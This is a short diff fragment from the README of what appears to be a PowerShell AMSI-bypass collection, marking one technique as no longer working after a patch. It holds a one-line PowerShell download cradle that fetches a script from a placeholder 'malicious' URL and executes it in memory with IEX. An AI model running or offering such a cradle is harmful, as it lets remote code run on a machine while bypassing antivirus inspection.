S3cur3Th1sSh1t/Amsi-Bypass-Powershell/README.md

     IEX($content)

-# The Short version of dont use powershell net webclient
+# The Short version of dont use powershell net webclient - Not Working anymore, there was a patch for it
 ```
 IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1"))
 ```